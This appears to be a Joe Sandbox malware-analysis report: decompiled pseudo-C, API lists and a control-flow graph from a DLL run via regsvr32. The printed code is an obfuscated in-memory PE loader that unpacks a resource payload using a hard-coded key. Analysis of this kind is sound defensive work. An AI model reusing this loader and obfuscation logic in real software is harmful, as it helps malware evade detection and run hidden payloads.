                                                                                                            						_t133 = _t77;
                                                                                                            						memcpy(_t133, _v4, _t124);
                                                                                                            						_t79 = malloc(0x9d1);
                                                                                                            						_t97 = _t79;
                                                                                                            						E10002340();
                                                                                                            						E100027D0();
                                                                                                            						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
                                                                                                            						_t83 = E10005260();
                                                                                                            						 *0x1004d408 = _t83;
                                                                                                            						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


























































                                                                                                            0x10006231
                                                                                                            0x10006236
                                                                                                            0x1000623b
                                                                                                            0x1000623c
                                                                                                            0x10006241
                                                                                                            0x10006246
                                                                                                            0x1000624b
                                                                                                            0x1000624c
                                                                                                            0x10006251
                                                                                                            0x10006259
                                                                                                            0x1000625e
                                                                                                            0x1000625f
                                                                                                            0x10006264
                                                                                                            0x10006269
                                                                                                            0x1000626e
                                                                                                            0x1000626f
                                                                                                            0x10006274
                                                                                                            0x10006279
                                                                                                            0x1000627e
                                                                                                            0x1000627f
                                                                                                            0x10006284
                                                                                                            0x10006289
                                                                                                            0x1000628e
                                                                                                            0x1000628f
                                                                                                            0x10006294
                                                                                                            0x10006299
                                                                                                            0x1000629e
                                                                                                            0x1000629f
                                                                                                            0x100062a4
                                                                                                            0x100062a9
                                                                                                            0x100062ae
                                                                                                            0x100062af
                                                                                                            0x100062b4
                                                                                                            0x100062b9
                                                                                                            0x100062be
                                                                                                            0x100062bf
                                                                                                            0x100062c4
                                                                                                            0x100062c9
                                                                                                            0x100062ce
                                                                                                            0x100062cf
                                                                                                            0x100062d4
                                                                                                            0x100062dc
                                                                                                            0x100062e1
                                                                                                            0x100062e2
                                                                                                            0x100062e7
                                                                                                            0x100062ec
                                                                                                            0x100062f1
                                                                                                            0x100062f2
                                                                                                            0x100062f7
                                                                                                            0x100062fc
                                                                                                            0x10006301
                                                                                                            0x10006302
                                                                                                            0x10006307
                                                                                                            0x1000630c
                                                                                                            0x10006311
                                                                                                            0x10006312
                                                                                                            0x10006317
                                                                                                            0x1000631c
                                                                                                            0x10006321
                                                                                                            0x10006322
                                                                                                            0x10006327
                                                                                                            0x1000632e
                                                                                                            0x10006333
                                                                                                            0x10006334
                                                                                                            0x1000633a
                                                                                                            0x1000633f
                                                                                                            0x10006344
                                                                                                            0x10006345
                                                                                                            0x1000634a
                                                                                                            0x1000634f
                                                                                                            0x10006361
                                                                                                            0x10006366
                                                                                                            0x10006368
                                                                                                            0x10006374
                                                                                                            0x1000637e
                                                                                                            0x10006380
                                                                                                            0x10006386
                                                                                                            0x10006432
                                                                                                            0x10006438
                                                                                                            0x1000643e
                                                                                                            0x10006443
                                                                                                            0x10006449
                                                                                                            0x10006459
                                                                                                            0x1000646d
                                                                                                            0x10006474
                                                                                                            0x10006476
                                                                                                            0x10006481
                                                                                                            0x10006487
                                                                                                            0x10006494
                                                                                                            0x100064c4
                                                                                                            0x100064c4
                                                                                                            0x100064ca
                                                                                                            0x1000638c
                                                                                                            0x1000638c
                                                                                                            0x10006392
                                                                                                            0x10006398
                                                                                                            0x1000639e
                                                                                                            0x100063a4
                                                                                                            0x100063b9
                                                                                                            0x100063d6
                                                                                                            0x100063fa
                                                                                                            0x10006427
                                                                                                            0x10006427
                                                                                                            0x100064d5
                                                                                                            0x100064d9
                                                                                                            0x100064e4
                                                                                                            0x100064f1
                                                                                                            0x10006503
                                                                                                            0x1000651a
                                                                                                            0x10006523
                                                                                                            0x10006546
                                                                                                            0x10006557
                                                                                                            0x1000655c
                                                                                                            0x00000000
                                                                                                            0x10006565
                                                                                                            0x10006133

                                                                                                            APIs
                                                                                                            • FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                                                            • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                                                            • memcpy.MSVCRT ref: 100064D9
                                                                                                            • malloc.MSVCRT ref: 100064E4
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                                                            • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll$pk
                                                                                                            • API String ID: 3024364686-783958072
                                                                                                            • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                                                            • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 98 10005260-1000530c 99 10006011-1000601a 98->99 100 10005312-10005361 98->100 100->99 101 10005367-10005409 100->101 101->99 102 1000540f-10005488 101->102 102->99 103 1000548e-100054cb 102->103 103->99 104 100054d1-10005505 103->104 104->99 105 1000550b-10005594 104->105 106 1000559a-100055be 105->106 107 100056bc-100056c2 105->107 108 100055c4-100055d1 106->108 109 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 107->109 111 100055d3-10005602 108->111 112 10005604-10005642 108->112 109->99 120 10005809-10005914 109->120 114 10005644-10005654 111->114 112->114 116 10005656-10005697 114->116 117 10005699 114->117 119 1000569f-100056b4 116->119 117->119 119->108 121 100056ba 119->121 123 10005a04-10005a9b GetProcessHeap HeapAlloc 120->123 124 1000591a-100059fc 120->124 121->109 125 10005ae8-10005bdd call 10002c60 123->125 126 10005a9d-10005ae7 123->126 124->99 130 10005a02 124->130 132 10005be3-10005e5a memcpy call 10002ca0 125->132 133 10006008-1000600e call 10004dd0 125->133 130->123 132->133 139 10005e60-10005ec1 132->139 133->99 140 10005ec7-10005f56 call 10003b80 139->140 141 10005f58 139->141 143 10005f5f-10005f91 call 10003f40 140->143 141->143 143->133 147 10005f93-10005fd6 call 10003570 143->147 149 10005fdb-10005fe0 147->149 149->133 150 10005fe2-10006006 call 10003ad0 149->150 150->133 153 1000601b-10006026 150->153 154 1000602c-10006031 153->154 155 1000610d-1000611d 153->155 156 10006033-100060a4 154->156 157 100060a5-1000610c 154->157
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E10005260() {
                                                                                                            				signed int _t340;
                                                                                                            				signed int _t351;
                                                                                                            				signed int _t354;
                                                                                                            				signed int _t356;
                                                                                                            				signed int _t360;
                                                                                                            				void* _t373;
                                                                                                            				signed int _t385;
                                                                                                            				signed int _t388;
                                                                                                            				signed int _t398;
                                                                                                            				signed int _t403;
                                                                                                            				intOrPtr _t405;
                                                                                                            				void* _t410;
                                                                                                            				signed int _t411;
                                                                                                            				signed int _t412;
                                                                                                            				signed int _t413;
                                                                                                            				signed int _t423;
                                                                                                            				signed int _t425;
                                                                                                            				void* _t433;
                                                                                                            				signed int _t436;
                                                                                                            				signed int _t437;
                                                                                                            				signed int _t438;
                                                                                                            				void* _t441;
                                                                                                            				signed int _t442;
                                                                                                            				signed int _t444;
                                                                                                            				signed int _t448;
                                                                                                            				intOrPtr _t453;
                                                                                                            				signed int _t454;
                                                                                                            				signed int _t463;
                                                                                                            				void* _t467;
                                                                                                            				signed int _t468;
                                                                                                            				signed int _t469;
                                                                                                            				void* _t473;
                                                                                                            				signed int _t474;
                                                                                                            				void* _t475;
                                                                                                            				void* _t476;
                                                                                                            				intOrPtr _t478;
                                                                                                            				signed int _t481;
                                                                                                            				void* _t492;
                                                                                                            				signed int _t498;
                                                                                                            				signed int _t520;
                                                                                                            				intOrPtr _t523;
                                                                                                            				signed int _t532;
                                                                                                            				signed int _t533;
                                                                                                            				signed short* _t542;
                                                                                                            				signed int _t545;
                                                                                                            				signed int _t563;
                                                                                                            				signed int _t571;
                                                                                                            				signed int _t579;
                                                                                                            				signed int _t580;
                                                                                                            				signed int _t583;
                                                                                                            				intOrPtr _t585;
                                                                                                            				signed int _t587;
                                                                                                            				signed int _t590;
                                                                                                            				signed int _t604;
                                                                                                            				signed int _t624;
                                                                                                            				intOrPtr _t636;
                                                                                                            				signed int _t637;
                                                                                                            				signed int _t642;
                                                                                                            				signed int _t665;
                                                                                                            				signed int _t668;
                                                                                                            				signed int _t673;
                                                                                                            				signed int _t691;
                                                                                                            				signed int _t692;
                                                                                                            				signed int _t706;
                                                                                                            				signed int _t707;
                                                                                                            				signed int _t716;
                                                                                                            				signed int _t717;
                                                                                                            				signed int _t722;
                                                                                                            				signed int _t726;
                                                                                                            				signed int _t731;
                                                                                                            				signed int _t732;
                                                                                                            				signed int _t733;
                                                                                                            				signed int _t736;
                                                                                                            				signed int _t738;
                                                                                                            				signed int _t739;
                                                                                                            				signed int _t743;
                                                                                                            				signed int _t752;
                                                                                                            				signed int _t754;
                                                                                                            				signed int _t756;
                                                                                                            				signed int _t759;
                                                                                                            				signed int _t761;
                                                                                                            				signed int _t765;
                                                                                                            				signed int _t766;
                                                                                                            				signed int _t770;
                                                                                                            				signed int _t778;
                                                                                                            				signed int _t780;
                                                                                                            				signed int _t789;
                                                                                                            				signed int _t795;
                                                                                                            				signed int _t836;
                                                                                                            				signed int _t840;
                                                                                                            				signed int _t841;
                                                                                                            				signed int _t853;
                                                                                                            				signed int _t867;
                                                                                                            				signed int _t888;
                                                                                                            				signed int _t890;
                                                                                                            				signed int _t891;
                                                                                                            				signed int _t895;
                                                                                                            				signed int _t900;
                                                                                                            				signed int _t903;
                                                                                                            				signed int _t905;
                                                                                                            				signed int _t907;
                                                                                                            				signed int _t913;
                                                                                                            				signed int _t918;
                                                                                                            				signed int _t921;
                                                                                                            				signed int _t924;
                                                                                                            				signed int _t928;
                                                                                                            				signed int _t930;
                                                                                                            				signed int _t932;
                                                                                                            				signed int _t933;
                                                                                                            				signed int _t934;
                                                                                                            				signed int _t941;
                                                                                                            				intOrPtr* _t951;
                                                                                                            				signed int _t954;
                                                                                                            				signed int _t955;
                                                                                                            				signed int _t956;
                                                                                                            				signed int _t962;
                                                                                                            				signed int _t963;
                                                                                                            				signed int _t970;
                                                                                                            				signed int _t971;
                                                                                                            				signed int _t981;
                                                                                                            				signed int _t988;
                                                                                                            				signed int _t989;
                                                                                                            				signed int _t995;
                                                                                                            				signed int _t1035;
                                                                                                            				signed int _t1041;
                                                                                                            				signed int _t1042;
                                                                                                            				signed int _t1043;
                                                                                                            				signed short _t1049;
                                                                                                            				signed int _t1050;
                                                                                                            				signed int _t1051;
                                                                                                            				signed int _t1064;
                                                                                                            				intOrPtr* _t1066;
                                                                                                            				signed int _t1067;
                                                                                                            				signed int _t1075;
                                                                                                            				signed int _t1076;
                                                                                                            				signed int _t1084;
                                                                                                            				signed int _t1085;
                                                                                                            				signed int _t1086;
                                                                                                            				signed int _t1091;
                                                                                                            				signed int _t1094;
                                                                                                            				signed int _t1097;
                                                                                                            				signed int _t1126;
                                                                                                            				signed int _t1128;
                                                                                                            				signed int _t1132;
                                                                                                            				signed int _t1135;
                                                                                                            				signed int _t1138;
                                                                                                            				signed int _t1153;
                                                                                                            				signed int _t1165;
                                                                                                            				signed int _t1166;
                                                                                                            				signed int _t1167;
                                                                                                            				intOrPtr* _t1168;
                                                                                                            				signed int _t1169;
                                                                                                            				signed int _t1170;
                                                                                                            				signed int _t1174;
                                                                                                            				signed int _t1184;
                                                                                                            				signed int _t1187;
                                                                                                            				signed int _t1200;
                                                                                                            				void* _t1202;
                                                                                                            				signed int _t1227;
                                                                                                            				signed int _t1237;
                                                                                                            				void* _t1248;
                                                                                                            				void* _t1249;
                                                                                                            				void* _t1250;
                                                                                                            				void* _t1251;
                                                                                                            
                                                                                                            				_t691 =  *0x1004b0ec; // 0x0
                                                                                                            				_t340 =  *0x1004b0e4; // 0x0
                                                                                                            				_t981 =  *0x1004b0e0; // 0x0
                                                                                                            				_t932 =  *0x1004b0d8; // 0x0
                                                                                                            				_t795 =  *0x1004b0dc; // 0x0
                                                                                                            				_t933 =  *0x1004b0e8; // 0x0
                                                                                                            				_t4 = _t981 * _t933 + 2; // 0x2
                                                                                                            				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
                                                                                                            				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
                                                                                                            				_t934 =  *0x1004b0e0; // 0x0
                                                                                                            				_t532 =  *0x1004b0d8; // 0x0
                                                                                                            				 *(_t1248 + 0x14) = 0;
                                                                                                            				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
                                                                                                            					L32:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t988 =  *0x1004b0e0; // 0x0
                                                                                                            					_t533 = _t532 * _t795;
                                                                                                            					_t941 =  *0x1004b0e8; // 0x0
                                                                                                            					_t989 = _t988 * _t691;
                                                                                                            					 *(_t1248 + 0x10) = _t533;
                                                                                                            					 *(_t1248 + 0x30) = _t989;
                                                                                                            					_t542 =  *(_t1248 + 0x5c);
                                                                                                            					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
                                                                                                            						goto L32;
                                                                                                            					} else {
                                                                                                            						_t995 = _t941 * _t691;
                                                                                                            						 *(_t1248 + 0x20) = _t542[0x1e];
                                                                                                            						 *(_t1248 + 0x2c) = _t995;
                                                                                                            						_t545 =  *0x1004b0d8; // 0x0
                                                                                                            						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
                                                                                                            						_t1126 =  *0x1004b0e0; // 0x0
                                                                                                            						_t36 = _t691 + 1; // 0x1
                                                                                                            						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
                                                                                                            							goto L32;
                                                                                                            						} else {
                                                                                                            							_t1128 =  *0x1004b0e8; // 0x0
                                                                                                            							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
                                                                                                            							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
                                                                                                            							 *(_t1248 + 0x18) = _t340 + _t340;
                                                                                                            							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
                                                                                                            							_t1132 =  *0x1004b0e8; // 0x0
                                                                                                            							_t563 =  *0x1004b0d8; // 0x0
                                                                                                            							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
                                                                                                            							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
                                                                                                            								goto L32;
                                                                                                            							} else {
                                                                                                            								_t1135 =  *0x1004b0e0; // 0x0
                                                                                                            								_t1138 =  *0x1004b0e0; // 0x0
                                                                                                            								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
                                                                                                            									goto L32;
                                                                                                            								} else {
                                                                                                            									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
                                                                                                            									_t1035 =  *0x1004b0e0; // 0x0
                                                                                                            									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
                                                                                                            									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
                                                                                                            										goto L32;
                                                                                                            									} else {
                                                                                                            										_t1041 =  *0x1004b0e0; // 0x0
                                                                                                            										_t1042 =  *0x1004b0e8; // 0x0
                                                                                                            										_t1043 =  *0x1004b0e8; // 0x0
                                                                                                            										_t571 =  *0x1004b0d8; // 0x0
                                                                                                            										_t1153 =  *0x1004b0e0; // 0x0
                                                                                                            										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                            										_t579 =  *(_t1248 + 0x18);
                                                                                                            										_t83 = _t795 - 2; // -2
                                                                                                            										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
                                                                                                            										if(_t1049 == 0) {
                                                                                                            											_t580 =  *0x1004b0d8; // 0x0
                                                                                                            											_t1050 =  *0x1004b0e8; // 0x0
                                                                                                            										} else {
                                                                                                            											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
                                                                                                            											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
                                                                                                            											_t673 =  *0x1004b0d8; // 0x0
                                                                                                            											 *(_t1248 + 0x20) = _t1049;
                                                                                                            											_t1086 =  *0x1004b0e8; // 0x0
                                                                                                            											do {
                                                                                                            												_t1237 =  *( *(_t1248 + 0x10) + 4);
                                                                                                            												 *(_t1248 + 0x18) = _t1237;
                                                                                                            												if(_t1237 != 0) {
                                                                                                            													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
                                                                                                            													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
                                                                                                            												} else {
                                                                                                            													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
                                                                                                            													_t1094 =  *0x1004b0e0; // 0x0
                                                                                                            													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
                                                                                                            												}
                                                                                                            												 *(_t1248 + 0x18) = _t1091;
                                                                                                            												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
                                                                                                            													_t673 =  *0x1004b0d8; // 0x0
                                                                                                            												} else {
                                                                                                            													_t1097 =  *0x1004b0e0; // 0x0
                                                                                                            													_t673 =  *0x1004b0d8; // 0x0
                                                                                                            													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
                                                                                                            												}
                                                                                                            												_t1086 =  *0x1004b0e8; // 0x0
                                                                                                            												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
                                                                                                            												_t129 = _t1248 + 0x20;
                                                                                                            												 *_t129 =  *(_t1248 + 0x20) - 1;
                                                                                                            											} while ( *_t129 != 0);
                                                                                                            										}
                                                                                                            										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
                                                                                                            										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
                                                                                                            										_t351 =  *0x1004b0e4; // 0x0
                                                                                                            										_t692 =  *0x1004b0ec; // 0x0
                                                                                                            										_t1165 =  *0x1004b0e8; // 0x0
                                                                                                            										_t1051 =  *0x1004b0dc; // 0x0
                                                                                                            										_t583 =  *0x1004b0e0; // 0x0
                                                                                                            										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
                                                                                                            										_t354 =  *0x1004b0d8; // 0x0
                                                                                                            										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
                                                                                                            										_t143 = _t354 + 2; // 0x2
                                                                                                            										_t356 =  *0x1004b0e4; // 0x0
                                                                                                            										_t360 =  *0x1004b0ec; // 0x0
                                                                                                            										_t146 = _t1051 + 0xa; // 0xa
                                                                                                            										_t706 =  *0x1004b0d8; // 0x0
                                                                                                            										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
                                                                                                            										_t707 = _t706 * _t1051;
                                                                                                            										 *(_t1248 + 0x14) = _t707;
                                                                                                            										_t1166 =  *0x1004b0ec; // 0x0
                                                                                                            										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
                                                                                                            										_t1167 =  *0x1004b0d8; // 0x0
                                                                                                            										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
                                                                                                            										_t1249 = _t1248 + 8;
                                                                                                            										if( *(_t1248 + 0x20) != _t373) {
                                                                                                            											goto L32;
                                                                                                            										} else {
                                                                                                            											_t716 =  *0x1004b0ec; // 0x0
                                                                                                            											 *(_t1249 + 0x20) = _t716 * _t1167;
                                                                                                            											_t165 = _t1051 + 2; // 0x3
                                                                                                            											_t717 =  *0x1004b0e8; // 0x0
                                                                                                            											_t166 = _t1167 + 1; // 0x1
                                                                                                            											_t385 =  *0x1004b0e4; // 0x0
                                                                                                            											_t388 =  *0x1004b0ec; // 0x0
                                                                                                            											_t398 =  *0x1004b0e4; // 0x0
                                                                                                            											_t403 =  *0x1004b0ec; // 0x0
                                                                                                            											_t722 =  *0x1004b0e8; // 0x0
                                                                                                            											_t182 = _t403 + 1; // 0x1
                                                                                                            											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
                                                                                                            											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
                                                                                                            											_t1250 = _t1249 + 0x14;
                                                                                                            											_t585 = _t405;
                                                                                                            											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
                                                                                                            											if(_t585 != 0) {
                                                                                                            												L21:
                                                                                                            												_t836 =  *0x1004b0e8; // 0x0
                                                                                                            												_t726 =  *0x1004b0ec; // 0x0
                                                                                                            												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
                                                                                                            												_t840 =  *0x1004b0d8; // 0x0
                                                                                                            												_t1064 =  *0x1004b0e4; // 0x0
                                                                                                            												_t841 =  *0x1004b0e8; // 0x0
                                                                                                            												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
                                                                                                            												_t731 =  *0x1004b0e8; // 0x0
                                                                                                            												_t411 =  *0x1004b0e0; // 0x0
                                                                                                            												_t412 =  *0x1004b0ec; // 0x0
                                                                                                            												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
                                                                                                            												if(_t1066 != 0) {
                                                                                                            													 *((intOrPtr*)(_t1066 + 4)) = _t585;
                                                                                                            													_t413 =  *0x1004b0e0; // 0x0
                                                                                                            													_t732 =  *0x1004b0ec; // 0x0
                                                                                                            													_t224 = _t732 * 2; // -268738780
                                                                                                            													_t853 =  *0x1004b0e8; // 0x0
                                                                                                            													_t733 =  *0x1004b0d8; // 0x0
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
                                                                                                            													asm("sbb eax, eax");
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
                                                                                                            													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
                                                                                                            													_t423 =  *0x1004b0e8; // 0x0
                                                                                                            													_t736 =  *0x1004b0e4; // 0x0
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
                                                                                                            													_t1169 =  *0x1004b0ec; // 0x0
                                                                                                            													_t425 =  *0x1004b0e4; // 0x0
                                                                                                            													_t738 =  *0x1004b0e0; // 0x0
                                                                                                            													_t587 =  *0x1004b0d8; // 0x0
                                                                                                            													_t739 =  *0x1004b0e8; // 0x0
                                                                                                            													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
                                                                                                            													_t867 =  *0x1004b0e0; // 0x0
